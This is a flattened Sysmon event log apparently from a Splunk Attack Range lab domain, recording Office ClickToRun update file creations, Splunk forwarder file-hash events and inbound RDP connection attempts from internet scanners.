14:54:20.581{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\C2R64.dll2021-04-20 14:54:20.581 11241100x800000000000000064795Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.581{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PropertyModelProxy.dll2021-04-20 14:54:20.581 11241100x800000000000000064794Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.581{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-crt-environment-l1-1-0.dll2021-04-20 14:54:20.581 11241100x800000000000000064793Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.581{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-crt-heap-l1-1-0.dll2021-04-20 14:54:20.565 11241100x800000000000000064792Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.581{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\AppvIsvSubsystems64.dll2021-04-20 14:54:20.565 11241100x800000000000000064791Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.581{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-crt-convert-l1-1-0.dll2021-04-20 14:54:20.565 11241100x800000000000000064790Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.565{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-crt-conio-l1-1-0.dll2021-04-20 14:54:20.565 11241100x800000000000000064789Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.534{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-crt-filesystem-l1-1-0.dll2021-04-20 14:54:20.534 11241100x800000000000000064788Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.534{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-crt-math-l1-1-0.dll2021-04-20 14:54:20.534 11241100x800000000000000064787Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.534{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-crt-locale-l1-1-0.dll2021-04-20 14:54:20.534 11241100x800000000000000064786Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.534{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-crt-multibyte-l1-1-0.dll2021-04-20 14:54:20.534 11241100x800000000000000064785Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.534{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-crt-private-l1-1-0.dll2021-04-20 14:54:20.534 11241100x800000000000000064784Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.534{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-crt-process-l1-1-0.dll2021-04-20 14:54:20.518 11241100x800000000000000064783Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.518{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-crt-runtime-l1-1-0.dll2021-04-20 14:54:20.518 11241100x800000000000000064782Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.518{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-crt-stdio-l1-1-0.dll2021-04-20 14:54:20.518 11241100x800000000000000064781Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.518{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-crt-string-l1-1-0.dll2021-04-20 14:54:20.518 11241100x800000000000000064780Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.518{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-crt-time-l1-1-0.dll2021-04-20 14:54:20.518 11241100x800000000000000064779Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.518{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-crt-utility-l1-1-0.dll2021-04-20 14:54:20.502 11241100x800000000000000064778Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:20.502{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\AppVDllSurrogate32.exe2021-04-20 14:54:20.502 11241100x800000000000000064777Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:20.502{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\AppVDllSurrogate64.exe2021-04-20 14:54:20.502 11241100x800000000000000064776Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:20.502{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\AppVLP.exe2021-04-20 14:54:20.502 11241100x800000000000000064775Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.487{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\concrt140.dll2021-04-20 14:54:20.487 11241100x800000000000000064774Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.487{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\mfc140u.dll2021-04-20 14:54:20.487 354300x800000000000000064773Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:18.549{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-33400-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000064772Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:18.300{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com63359-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000064771Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:20.409{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFD2AAC07A07279868865C0D25AF8FAD,SHA256=D3239EF0E132F359FFA7A77059DE9C6A44AD99F36CD59D385FBA2A1084ED2E00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064770Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:20.221{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=005B59C94DAABD72B09D44B0F21691A8,SHA256=7B23511AC716F78930D54F5C938CACCC50A0BADBC3E05F5B3BAEA99912CE9903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049494Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:20.854{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CDFB93D06222A97EC41CD4CF848AF85,SHA256=C9ECFB337AC6A7741741FE9D834BFFF4A4DA750629620DB891A642F5A092E3A3,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049493Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:17.356{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-63541-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000064840Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:21.831{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9216D735C5A0CDF66593B7B71C5A1751,SHA256=9161D66265F318E6B6BD479A696614AD717B2533BB9A906B3C0D4C3D6D28F4D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064839Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:21.831{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E18D5E8A3AEBB6DEA84A2046B7841CBE,SHA256=97F1267B0BCF9EDC06EFA147592EC964F8F84EF8C5C90BB7D3A3CE71BD15EBE1,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000064838Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:21.815{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ssscreenvvs.dll2021-04-20 14:54:21.815 11241100x800000000000000064837Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:21.815{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Rtmmvrsplitter.dll2021-04-20 14:54:21.815 11241100x800000000000000064836Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:21.815{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\rtmmvrcs.dll2021-04-20 14:54:21.815 11241100x800000000000000064835Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:21.815{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Rtmmvras.dll2021-04-20 14:54:21.815 11241100x800000000000000064834Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:21.815{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\lynchtmlconvpxy.dll2021-04-20 14:54:21.815 11241100x800000000000000064833Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:21.502{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL2021-04-20 14:54:21.502 11241100x800000000000000064832Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:21.487{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\MSOINTL.DLL2021-04-20 14:54:21.487 11241100x800000000000000064831Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:21.487{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\msointl30.dll2021-04-20 14:54:21.487 11241100x800000000000000064830Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:21.487{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookServicing.DLL2021-04-20 14:54:21.487 11241100x800000000000000064829Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:21.487{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\POWERPNT.EXE2021-04-20 14:54:21.487 11241100x800000000000000064828Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:21.018{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEERR.DLL2021-04-20 14:54:21.018 11241100x800000000000000064827Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:21.018{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Win32MsgQueue.dll2021-04-20 14:54:21.018 11241100x800000000000000064826Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:21.018{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-crt-private-l1-1-0.dll2021-04-20 14:54:21.018 11241100x800000000000000064825Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:21.018{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\concrt140.dll2021-04-20 14:54:21.018 11241100x800000000000000064824Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:21.018{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-crt-utility-l1-1-0.dll2021-04-20 14:54:21.018 11241100x800000000000000064823Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:21.018{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-crt-string-l1-1-0.dll2021-04-20 14:54:21.018 11241100x800000000000000064822Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:21.018{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-crt-stdio-l1-1-0.dll2021-04-20 14:54:21.018 11241100x800000000000000064821Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:21.018{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-crt-runtime-l1-1-0.dll2021-04-20 14:54:21.018 11241100x800000000000000064820Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:21.018{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-crt-process-l1-1-0.dll2021-04-20 14:54:20.940 23542300x800000000000000049496Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:21.869{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA54C43B7FCAF72CAB80F6A0291072CF,SHA256=69E4E3B7F46B9B600D1BB33D426DAF382CBD5768F8430475B10E523ED4FBBEE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049495Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:21.541{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6D0B0899DBFDB97D17339218FB620AFA,SHA256=ADB66076A7D04A0E52A4FB6FF8D31AA46CB44C1589C32CC4B00E497B81C73E05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064843Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:22.518{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB87CF75E6BDB5DBFBCB1629CE955C23,SHA256=1EA9C90F9A0F92785B84F9B969C0283B5D506143E444ABD2F97582B61B8D42B8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000064842Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:21.261{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57488-false10.0.1.12-8000- 354300x800000000000000064841Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:20.897{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com63028-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000049498Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:22.885{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=337EDE49CE4B53E006922631781641C0,SHA256=90115AB2BFF6DB422C17B2C6B0C97D7C76C8D98F240B22FBED20B64EC3EBAD92,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049497Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:20.458{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-50127-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000064844Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:23.721{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8076FA79C8561E5835C07A80BA851AC,SHA256=3F9484801F6D8ED74D8CB22B6F989983668BA95795DD4484CEC7CB8E9382183A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049500Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:23.901{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44AFF331BC60BCF58A04B51F87B0504C,SHA256=91AB91CCF2A716B0E532AC255E3147420AAD08918580ED229D657B47A09B020E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049499Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:23.682{85C0FFC9-B85C-607E-9700-00000000BB01}3076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=F985E1E51BD4FEB45E4931E1523E80EA,SHA256=E168C793E8F8BB7D1EAC66F2B963AAC5E0DD0FE2CCEBAB9CCFC61E8C70CE4293,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064847Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:24.815{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5B19B7E2BBC35D9C7D890D6DF19F297A,SHA256=993257356386AE83730A94B89D9927693AFF8AB6056C72645049ED8D89C23398,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064846Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 